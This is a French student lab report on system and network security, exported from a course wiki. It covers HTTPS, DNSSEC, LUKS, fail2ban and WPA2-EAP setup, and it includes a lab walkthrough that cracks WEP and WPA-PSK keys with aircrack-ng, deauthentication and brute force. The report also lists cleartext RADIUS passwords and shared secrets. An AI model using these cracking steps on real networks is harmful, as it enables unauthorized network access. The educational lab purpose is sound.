| style=&amp;quot;text-align: left;&amp;quot;| Serveur DNS secondaire&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 1&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns1.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv6: 2001:660:4401:60a0:216:3eff:fe47:bbe7&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Glue Record 2&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| ns2.msalhi.online&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| IPv4: 193.48.57.167&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-site-web-par-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de site Web par certificat ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;génération-du-csr-et-obtention-du-certificat&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Génération du CSR et obtention du certificat ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Génération de la clé privée&lt;br /&gt;
openssl genrsa -out /etc/ssl/private/myserver.key 2048&lt;br /&gt;
&lt;br /&gt;
# Génération du CSR&lt;br /&gt;
openssl req -new -key /etc/ssl/private/myserver.key \&lt;br /&gt;
  -out /etc/ssl/private/server.csr&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-apache-sur-moon-https-direct-ipv6&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration Apache sur Moon (HTTPS direct IPv6) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-ssl.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    ServerAlias www.msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    DocumentRoot /var/www/html&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    Header always set Strict-Transport-Security &amp;quot;max-age=63072000; includeSubDomains&amp;quot;&lt;br /&gt;
    Header always set X-Frame-Options DENY&lt;br /&gt;
    Header always set X-Content-Type-Options nosniff&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/msalhi_ssl_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/msalhi_ssl_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation&lt;br /&gt;
a2enmod ssl&lt;br /&gt;
a2ensite msalhi-ssl.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-du-proxy-inverse-sur-solstice-https-ipv4&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration du proxy inverse sur Solstice (HTTPS IPv4) ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Fichier /etc/apache2/sites-available/msalhi-proxy.conf&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    Redirect permanent / https://msalhi.online/&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;&lt;br /&gt;
    ServerName msalhi.online&lt;br /&gt;
    &lt;br /&gt;
    SSLEngine on&lt;br /&gt;
    SSLCertificateFile /etc/ssl/msalhi/msalhi.online.crt&lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/msalhi/msalhi.online.key&lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/msalhi/GandiStandardSSLCA2.pem&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyEngine on&lt;br /&gt;
    ProxyPreserveHost On&lt;br /&gt;
    &lt;br /&gt;
    # Utilisation de l'URL avec nom de domaine comme demandé&lt;br /&gt;
    ProxyPass / https://msalhi.online/&lt;br /&gt;
    ProxyPassReverse / https://msalhi.online/&lt;br /&gt;
    &lt;br /&gt;
    SSLProxyVerify none&lt;br /&gt;
    SSLProxyCheckPeerCN off&lt;br /&gt;
    &lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/proxy_error.log&lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/proxy_access.log combined&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
# Activation des modules&lt;br /&gt;
a2enmod proxy proxy_http ssl&lt;br /&gt;
a2ensite msalhi-proxy.conf&lt;br /&gt;
systemctl restart apache2&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;sécurisation-de-serveur-dns-par-dnssec&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
== Sécurisation de serveur DNS par DNSSEC ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;configuration-dnssec-automatique&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Configuration DNSSEC automatique ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;# Création du répertoire pour les clés&lt;br /&gt;
mkdir -p /etc/bind/keys&lt;br /&gt;
chown bind:bind /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
# Ajout dans named.conf.local&lt;br /&gt;
zone &amp;quot;msalhi.online&amp;quot; {&lt;br /&gt;
    type master;&lt;br /&gt;
    file &amp;quot;/etc/bind/zones/db.msalhi.online&amp;quot;;&lt;br /&gt;
    key-directory &amp;quot;/etc/bind/keys&amp;quot;;&lt;br /&gt;
    dnssec-policy &amp;quot;dnspol&amp;quot;;&lt;br /&gt;
    inline-signing yes;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Politique DNSSEC dans named.conf.options&lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {&lt;br /&gt;
    keys {&lt;br /&gt;
        ksk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
        zsk key-directory lifetime unlimited algorithm 13;&lt;br /&gt;
    };&lt;br /&gt;
    nsec3param;&lt;br /&gt;
};&lt;br /&gt;
&lt;br /&gt;
# Redémarrage et vérification&lt;br /&gt;
systemctl restart bind9&lt;br /&gt;
dig @localhost msalhi.online DNSKEY +dnssec&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;résultat-des-clés-dnssec-générées&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Résultat des clés DNSSEC générées ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;; Clés obtenues via : dig @localhost msalhi.online DNSKEY +dnssec&lt;br /&gt;
&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  256 3 13 Mi9LJ2JnnUciYfGEXoDuZ0ElzOigo+Fjxhf2I1+zxZqcn7SN1FxxGfFJ v4xNsU/YTvGgzf7ZWgWa29b+OQOSug==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhh HW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
msalhi.online.        3600    IN  DNSKEY  257 3 13 Z4LE6oWmFPOb+QzklArdW7HWkH6kVrjIgrKYrJBMW3n6sMwwEG1YruHe SvmXJ9GwuFxhqtRu130iPse3wrJqyQ==&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;enregistrement-de-la-ksk-chez-gandi&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
=== Enregistrement de la KSK chez Gandi ===&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
|+ Configuration DNSSEC chez Gandi&lt;br /&gt;
|-&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Paramètre'''&lt;br /&gt;
! style=&amp;quot;text-align: left;&amp;quot;| '''Valeur'''&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Algorithm&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 13 (ECDSAP256SHA256)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Flags&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| 257 (KSK)&lt;br /&gt;
|-&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| Public Key&lt;br /&gt;
| style=&amp;quot;text-align: left;&amp;quot;| QrPmyYhhAVx1TGYLWRtAx/LbhQPy3yMd5/GoMH5SZ4aWD72QGVrfBOhhHW0/c1dYroeZ9riJTyQcO859svIWRw==&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Effraction WiFi =&lt;br /&gt;
&lt;br /&gt;
== Cassage de clef WEP d’un point d’accès WiFi ==&lt;br /&gt;
Le réseau cible était &amp;lt;code&amp;gt;cracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;04:DA:D2:9C:50:50&amp;lt;/code&amp;gt;, canal 4). La procédure a été réalisée depuis la machine &amp;lt;code&amp;gt;zabeth13&amp;lt;/code&amp;gt; avec les outils &amp;lt;code&amp;gt;aircrack-ng&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Passage de la carte en mode monitor :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airmon-ng start wlan0&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 4 --bssid 04:DA:D2:9C:50:50 -w capture_wep wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Authentification fake (association au point d’accès) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -1 6000 -o 1 -q 10 -e cracotte01 -a 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Attaque ARP replay pour générer du trafic :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -3 -b 04:DA:D2:9C:50:50 -h a0:b3:39:5a:dc:c8 wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après accumulation d’environ 40 000 IVs, lancement de aircrack‑ng :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aircrack-ng capture_wep-01.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La clé WEP a été trouvée en moins de 15 minutes : &amp;lt;code&amp;gt;FF:FF:FF:FF:FA:BC:02:CB:AE:EE:EE:EE:EE&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
== Cassage de mot de passe WPA‑PSK par force brute ==&lt;br /&gt;
Le réseau &amp;lt;code&amp;gt;kracotte01&amp;lt;/code&amp;gt; (BSSID &amp;lt;code&amp;gt;44:AD:D9:5F:87:00&amp;lt;/code&amp;gt;, canal 13) utilisait WPA2‑PSK.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;ol&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Capture ciblée :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo airodump-ng -c 13 --bssid 44:AD:D9:5F:87:00 -w wpa_capture wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Désauthentification d’un client (identifié &amp;lt;code&amp;gt;40:A5:EF:01:25:8B&amp;lt;/code&amp;gt;) pour forcer un handshake :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;sudo aireplay-ng -0 10 -a 44:AD:D9:5F:87:00 -c 40:A5:EF:01:25:8B wlan0mon&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Après apparition du message '''“WPA handshake”''' dans &amp;lt;code&amp;gt;airodump‑ng&amp;lt;/code&amp;gt;, lancement de l’attaque par dictionnaire (mots de passe à 8 chiffres) :&lt;br /&gt;
    &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;crunch 8 8 0123456789 | sudo aircrack-ng -b 44:AD:D9:5F:87:00 -w - wpa_capture-06.cap&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
  &amp;lt;/li&amp;gt;&lt;br /&gt;
  &amp;lt;li&amp;gt;Résultat : le mot de passe &amp;lt;code&amp;gt;66689666&amp;lt;/code&amp;gt; a été découvert après environ 30 minutes.&amp;lt;/li&amp;gt;&lt;br /&gt;
&amp;lt;/ol&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ces tests illustrent la vulnérabilité des protocoles WEP et des mots de passe courts face à des attaques par force brute.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
= Sécurisations =&lt;br /&gt;
&lt;br /&gt;
== Chiffrement de données ==&lt;br /&gt;
Sur Moon, une partition supplémentaire (disque virtuel &amp;lt;code&amp;gt;xvdb&amp;lt;/code&amp;gt;, correspondant au volume LVM &amp;lt;code&amp;gt;SE4.Moon.home&amp;lt;/code&amp;gt;) a été chiffrée avec LUKS.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
# Chiffrement de la partition&lt;br /&gt;
cryptsetup luksFormat /dev/xvdb&lt;br /&gt;
&lt;br /&gt;
# Ouverture du conteneur&lt;br /&gt;
cryptsetup open /dev/xvdb home_crypt&lt;br /&gt;
&lt;br /&gt;
# Création d’un système de fichiers&lt;br /&gt;
mkfs.ext4 /dev/mapper/home_crypt&lt;br /&gt;
&lt;br /&gt;
# Montage manuel&lt;br /&gt;
mount /dev/mapper/home_crypt /mnt/secret&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour automatiser le montage au démarrage, on ajoute dans &amp;lt;code&amp;gt;/etc/crypttab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
home_crypt /dev/xvdb none luks&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
et dans &amp;lt;code&amp;gt;/etc/fstab&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/dev/mapper/home_crypt /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le mot de passe doit être saisi manuellement à chaque démarrage, ce qui est acceptable pour un serveur de test.&lt;br /&gt;
&lt;br /&gt;
== Filtrage des services – fail2ban ==&lt;br /&gt;
Pour protéger SSH et les requêtes DNS malveillantes, &amp;lt;code&amp;gt;fail2ban&amp;lt;/code&amp;gt; a été installé sur Moon et Solstice.&lt;br /&gt;
&lt;br /&gt;
Fichier &amp;lt;code&amp;gt;/etc/fail2ban/jail.local&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[DEFAULT]&lt;br /&gt;
bantime = 3600&lt;br /&gt;
findtime = 600&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[sshd]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = ssh&lt;br /&gt;
filter = sshd&lt;br /&gt;
logpath = /var/log/auth.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&lt;br /&gt;
[named-refused-tcp]&lt;br /&gt;
enabled = true&lt;br /&gt;
port = domain,953&lt;br /&gt;
protocol = tcp&lt;br /&gt;
filter = named-refused&lt;br /&gt;
logpath = /var/log/named/security.log&lt;br /&gt;
maxretry = 3&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Filtre &amp;lt;code&amp;gt;/etc/fail2ban/filter.d/named-refused.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
[Definition]&lt;br /&gt;
failregex = ^\S+ named\[\d+\]: client &amp;lt;HOST&amp;gt;#\S+ .* query .* denied&lt;br /&gt;
ignoreregex =&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Le service est démarré et activé :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
systemctl enable fail2ban&lt;br /&gt;
systemctl restart fail2ban&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Sécurisation WiFi par WPA2‑EAP ==&lt;br /&gt;
&lt;br /&gt;
=== Serveur FreeRADIUS sur Moon ===&lt;br /&gt;
Installation :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
apt install freeradius freeradius-utils -y&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Ajout du client (point d’accès) dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/clients.conf&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
client vlan1_ap1 {&lt;br /&gt;
    ipaddr = 172.27.0.4    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap1-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
client vlan1_ap2 {&lt;br /&gt;
    ipaddr = 172.27.0.3    # VLAN 1 management&lt;br /&gt;
    secret = testing123&lt;br /&gt;
    shortname = cisco-ap2-vlan1&lt;br /&gt;
    nas_type = cisco&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Création d’un utilisateur dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/users&amp;lt;/code&amp;gt; :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;quot;msalhi&amp;quot; Cleartext-Password := &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
    &lt;br /&gt;
&amp;quot;etudiant1&amp;quot; Cleartext-Password := &amp;quot;Password123&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;quot;prof&amp;quot; Cleartext-Password := &amp;quot;AdminSE4!&amp;quot;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Configuration EAP pour PEAP‑MSCHAPv2 dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/mods-enabled/eap&amp;lt;/code&amp;gt; (type par défaut &amp;lt;code&amp;gt;peap&amp;lt;/code&amp;gt;, tunnel intérieur &amp;lt;code&amp;gt;mschapv2&amp;lt;/code&amp;gt;).  &lt;br /&gt;
Un conflit de port (18120) a été résolu en commentant la section &amp;lt;code&amp;gt;listen&amp;lt;/code&amp;gt; dans &amp;lt;code&amp;gt;/etc/freeradius/3.0/sites-enabled/inner-tunnel&amp;lt;/code&amp;gt; (ou en mettant &amp;lt;code&amp;gt;port = 0&amp;lt;/code&amp;gt;).&lt;br /&gt;
&lt;br /&gt;
Test local :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
radtest msalhi WifiSecure2026! localhost 0 testing123&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Sent Access-Request Id 13 from 0.0.0.0:55851 to 127.0.0.1:1812 length 76&lt;br /&gt;
	User-Name = &amp;quot;msalhi&amp;quot;&lt;br /&gt;
	User-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
	NAS-IP-Address = 127.0.0.1&lt;br /&gt;
	NAS-Port = 0&lt;br /&gt;
	Message-Authenticator = 0x00&lt;br /&gt;
	Cleartext-Password = &amp;quot;WifiSecure2026!&amp;quot;&lt;br /&gt;
Received Access-Accept Id 13 from 127.0.0.1:1812 to 127.0.0.1:55851 length 20&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
→ réponse &amp;lt;code&amp;gt;Access-Accept&amp;lt;/code&amp;gt; attendue.&lt;br /&gt;
&lt;br /&gt;
=== Configuration du point d’accès WiFi ===&lt;br /&gt;
Sur le point d’accès (wifi‑E304), les lignes suivantes ont été ajoutées (en conservant les configurations des autres étudiants) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
aaa group server radius radius_student25&lt;br /&gt;
 server 192.168.20.2 auth-port 1812 acct-port 1813&lt;br /&gt;
&lt;br /&gt;
aaa authentication login eap_student25 group radius_student25&lt;br /&gt;
&lt;br /&gt;
dot11 ssid VM_SERVICES_15&lt;br /&gt;
 vlan 25&lt;br /&gt;
 authentication open eap eap_student25&lt;br /&gt;
 authentication network-eap eap_student25&lt;br /&gt;
 authentication key-management wpa version 2&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0&lt;br /&gt;
 encryption vlan 25 mode ciphers aes-ccm&lt;br /&gt;
 ssid VM_SERVICES_15&lt;br /&gt;
&lt;br /&gt;
interface Dot11Radio0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
interface GigabitEthernet0.25&lt;br /&gt;
 encapsulation dot1Q 25&lt;br /&gt;
 bridge-group 25&lt;br /&gt;
&lt;br /&gt;
radius-server host 192.168.20.2 auth-port 1812 acct-port 1813 key radius_secret_salhi_2026&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Configuration DHCP sur les routeurs ===&lt;br /&gt;
Sur '''E304''' (plage 100‑150) :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip dhcp excluded-address 10.60.15.1 10.60.15.99&lt;br /&gt;
ip dhcp excluded-address 10.60.15.151 10.60.15.254&lt;br /&gt;
&lt;br /&gt;
ip dhcp pool SALHI_VLAN25&lt;br /&gt;
 network 10.60.15.0 255.255.255.0&lt;br /&gt;
 default-router 10.60.15.1&lt;br /&gt;
 dns-server 192.168.20.2 8.8.8.8&lt;br /&gt;
 domain-name msalhi.online&lt;br /&gt;
 lease 0 12&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Sur '''E306''' (plage 151‑200), configuration similaire avec une plage différente.&lt;br /&gt;
&lt;br /&gt;
=== Policy‑Based Routing (PBR) ===&lt;br /&gt;
Pour que le trafic IPv4 du VLAN 25 passe par Solstice (où il sera NATé vers Internet), on a configuré sur E304 :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;cisco&amp;quot;&amp;gt;&lt;br /&gt;
ip access-list extended TRAFIC_VLAN25&lt;br /&gt;
 permit ip 10.60.15.0 0.0.0.255 any&lt;br /&gt;
!&lt;br /&gt;
route-map PBR_VLAN25 permit 10&lt;br /&gt;
 match ip address TRAFIC_VLAN25&lt;br /&gt;
 set ip next-hop 193.48.57.167&lt;br /&gt;
!&lt;br /&gt;
interface Vlan25&lt;br /&gt;
 ip policy route-map PBR_VLAN25&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cette politique force tout le trafic IPv4 du VLAN 25 vers Solstice. La mascarade a ensuite été élargie sur Solstice pour inclure ce réseau :&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A POSTROUTING -s 10.60.15.0/24 -o eth1 -j MASQUERADE&lt;br /&gt;
iptables-save &amp;gt; /etc/iptables/rules.v4&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests ===&lt;br /&gt;
Un client connecté au SSID &amp;lt;code&amp;gt;VM_SERVICES_15&amp;lt;/code&amp;gt; obtient une adresse IP dans la plage DHCP (ex. &amp;lt;code&amp;gt;10.60.15.101&amp;lt;/code&amp;gt;), peut résoudre des noms DNS (via Moon) et accéder à Internet. Le traceroute montre le passage par Solstice (&amp;lt;code&amp;gt;193.48.57.167&amp;lt;/code&amp;gt;).&lt;/div&gt;</summary>
		<author><name>Msalhi</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12472</id>
		<title>Atelier SysRes SE4 2025/2026 E15</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E15&amp;diff=12472"/>
		<updated>2026-02-27T11:24:46Z</updated>

		<summary type="html">&lt;p&gt;Msalhi : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
&amp;lt;div class=&amp;quot;titlepage&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Rapport de Projet SE4 IdO&amp;lt;br /&amp;gt;&lt;br /&gt;
Sécurité Système/Réseau'''&lt;br /&gt;
&lt;br /&gt;
'''Année Universitaire 2025-2026'''&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div class=&amp;quot;figure&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[File:polytech_logo.png|image]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
'''Étudiant: Mohamed SALHI'''&lt;br /&gt;
&lt;br /&gt;
'''Binôme: SE4.Solstice (mandataire) - SE4.Moon (services)'''&lt;br /&gt;
&lt;br /&gt;
'''Domaine: &amp;lt;code&amp;gt;msalhi.online&amp;lt;/code&amp;gt;'''&lt;br /&gt;
&lt;br /&gt;
'''École Polytechnique Universitaire de Lille'''&lt;br /&gt;
&lt;br /&gt;
2026-02-02&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;span id=&amp;quot;introduction&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Introduction =&lt;br /&gt;
&lt;br /&gt;
Ce rapport documente la réalisation complète du projet de sécurité système et réseau dans le cadre du module SE4 IdO (Internet des Objets). L’objectif principal était de mettre en place une infrastructure réseau complète avec services virtualisés, en mettant l’accent sur la sécurité et la redondance.&lt;br /&gt;
&lt;br /&gt;
L’architecture repose sur une approche '''dual-stack IPv4/IPv6''' avec :&lt;br /&gt;
&lt;br /&gt;
* Une '''machine de services''' (SE4.Moon) hébergeant les services applicatifs&lt;br /&gt;
* Une '''machine mandataire''' (SE4.Solstice) gérant les accès IPv4 via NAT et proxy inverse&lt;br /&gt;
* Une infrastructure réseau redondante avec routeurs Cisco C9200&lt;br /&gt;
* Des services sécurisés (DNS avec DNSSEC, HTTPS avec certificats, SSH avec filtrage)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;span id=&amp;quot;atelier-système-et-réseau---machines-virtuelles&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&lt;br /&gt;
= Atelier système et réseau - Machines virtuelles =&lt;br /&gt;
&lt;br /&gt;
